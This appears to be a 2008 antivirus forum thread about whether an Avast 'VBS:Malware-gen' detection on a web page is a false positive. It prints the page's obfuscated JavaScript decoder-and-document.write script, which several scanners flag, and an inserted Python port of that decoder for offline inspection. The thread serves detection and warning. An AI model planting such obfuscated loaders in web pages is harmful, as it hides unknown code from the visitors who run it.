Believed False Positive: Malware-Gen

My Avast On-Access reports “VBS:Malware-gen” as detected on the following web page:

hhtp://www.writeantiques.com/bumblebee-puts-sting-into-crime-fighting/
(Change the obvious at the beginning; I didn’t want a working link just in case the page really does house an infection!)

AVG does not report any issues with the site; nor does Trend OfficeScan. I therefore suspect it to be a false positive by Avast.

Avast version 4.8 Home Edition
Build: Jul2008(4.8.1229)
VPS Version: 080925-0, 25/09/2008

Regards,
Jon.

Bad for them… the site is infected…

It does look like a good detection, see http://www.virustotal.com/analisis/cc5438fdec1a81e18d436108ed4d7167.

I had a quick look at the code on the page and I think this might be what is making avast and the other AVs anxious. The code in the “document.write” bit in particular: I believe this might just be a page counter, but it does a lot to hide what it is doing.


<!-- start counter :rkgi58s:wpnjs --><script language=JavaScript>
function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,
t=Array(63,43,20,57,12,11,8,46,29,16,0,0,0,0,0,0,27,62,
19,4,9,26,58,60,59,31,22,23,48,36,55,34,25,56,28,1,21,10,32,38,49,47,3,0,0,0,0,39,0,14,61,
52,13,30,50,18,42,44,54,0,51,35,45,2,15,33,24,7,5,40,6,41,53,37,17);
for(j=Math.ceil(l/b);j>0;j--){r="";for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;
if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}
dc("PEnXKlRxzKuxK@4WojRczKb_UhQx9ePlU@8c5hGxo1uxzBRcUU8x5YQlJ5rqzl8xkmwVzZRNz1QlCpdXJ@Gx4K8co7PWUEnXKlRxzYDhYo")
</script>
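A static way to see what that document.write ends up writing, added here as an example and not part of David's post or of the site's code: a Python port of the posted dc() decoder that collects the output instead of executing it in a browser. The substitution table and the constant 165 are copied from the script above; everything else (the function names, the regex that pulls out the dc("…") argument, and the sample payload "nZRfD14q", which was constructed by hand to decode to "Hello!") is assumed for the demonstration and is not the string from the page. To inspect the real page's counter, paste its dc("…") argument into dc_decode() (or the whole snippet into decode_page()) and read the result in a text editor rather than loading it.

```python
import re

# Substitution table copied from the posted dc() function. The script indexes
# t[charCode - 48], so index 0 is '0' (code 48) and index 74 is 'z' (code 122).
T = [63, 43, 20, 57, 12, 11, 8, 46, 29, 16, 0, 0, 0, 0, 0, 0, 27, 62,
     19, 4, 9, 26, 58, 60, 59, 31, 22, 23, 48, 36, 55, 34, 25, 56, 28, 1,
     21, 10, 32, 38, 49, 47, 3, 0, 0, 0, 0, 39, 0, 14, 61,
     52, 13, 30, 50, 18, 42, 44, 54, 0, 51, 35, 45, 2, 15, 33, 24, 7, 5,
     40, 6, 41, 53, 37, 17]

XOR_KEY = 165  # the constant in `165^w&255`; & binds tighter than ^ in JavaScript


def dc_decode(encoded: str) -> str:
    """Return the text the posted dc() would hand to document.write().

    Four payload characters carry three output bytes: each character is mapped
    through T to a 6-bit value, the values are packed little-endian into an
    accumulator, and every completed byte is XORed with 165. The original's
    1024-character chunking only decides how many document.write() calls are
    made; it does not change the bytes, so a single pass is equivalent.
    """
    out = []
    w = 0  # bit accumulator (the script's `w`)
    s = 0  # current shift (the script's `s`): cycles 0 -> 6 -> 4 -> 2 -> 0
    for ch in encoded:
        idx = ord(ch) - 48
        if not 0 <= idx < len(T):
            raise ValueError(f"{ch!r} is outside the decoder's alphabet")
        w |= T[idx] << s
        if s:
            out.append(chr(XOR_KEY ^ (w & 0xFF)))
            w >>= 8
            s -= 2
        else:
            s = 6
    return "".join(out)


# Hypothetical helper: finds every dc("...") call in a saved copy of the page.
_DC_CALL = re.compile(r'dc\("([^"]*)"\)')


def extract_payloads(html: str) -> list:
    """Pull every dc("...") argument out of page source for offline decoding."""
    return _DC_CALL.findall(html)


def decode_page(html: str) -> list:
    """Decode all dc() payloads found in `html`; nothing from the page is executed."""
    return [dc_decode(p) for p in extract_payloads(html)]


# Constructed sample, not the payload from the thread: "nZRfD14q" was built by
# hand to decode to "Hello!" under this scheme.
SAMPLE_HTML = (
    '<!-- start counter --><script language=JavaScript>'
    'function dc(x){/* decoder as posted */}dc("nZRfD14q")</script>'
)

if __name__ == "__main__":
    for payload, decoded in zip(extract_payloads(SAMPLE_HTML), decode_page(SAMPLE_HTML)):
        print(f"{payload!r} -> {decoded!r}")
```

The decoder raises on any character outside '0'..'z' rather than silently indexing past the table, which is the behaviour the JavaScript version would have (an undefined entry shifted into `w`); seeing that error is a useful hint that a payload was truncated or mangled when it was copied out of the page.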

David, thanks for putting in the time to look at this query :wink:

So, your analysis is that the page does not actually contain a virus or malware?


Some page counters are not just page counters.


Install a HOSTS file to prevent page counters from counting.

HOSTS files I use:
http://www.mvps.org/winhelp2002/hosts.htm
http://hosts-file.net/?s=Download

Managed with HostsMan and I use its HostsServer proxy to speed up browsing:
http://www.abelhadigital.com

You’re welcome.

No, what I’m saying is really: why is it going to the trouble of obfuscating the code? It is this which might be why avast and 8 other scanners are alerting on it (including GData, which also uses avast as one of its scanners, making 9 detections in total).

It needs further analysis by avast (I have sent a sample), as it is beyond my limited knowledge; being able to suspect why it might be detected is less than knowing exactly what the code is doing.

So I would err on the side of safety (along with the multiple detections) and wouldn’t visit that site.

@ YoKenny
I don’t know if a hosts file would prevent this type of obfuscated code (assuming it is indeed a page hit counter) as it wouldn’t have a clearly defined domain name to work with.

I would post the same…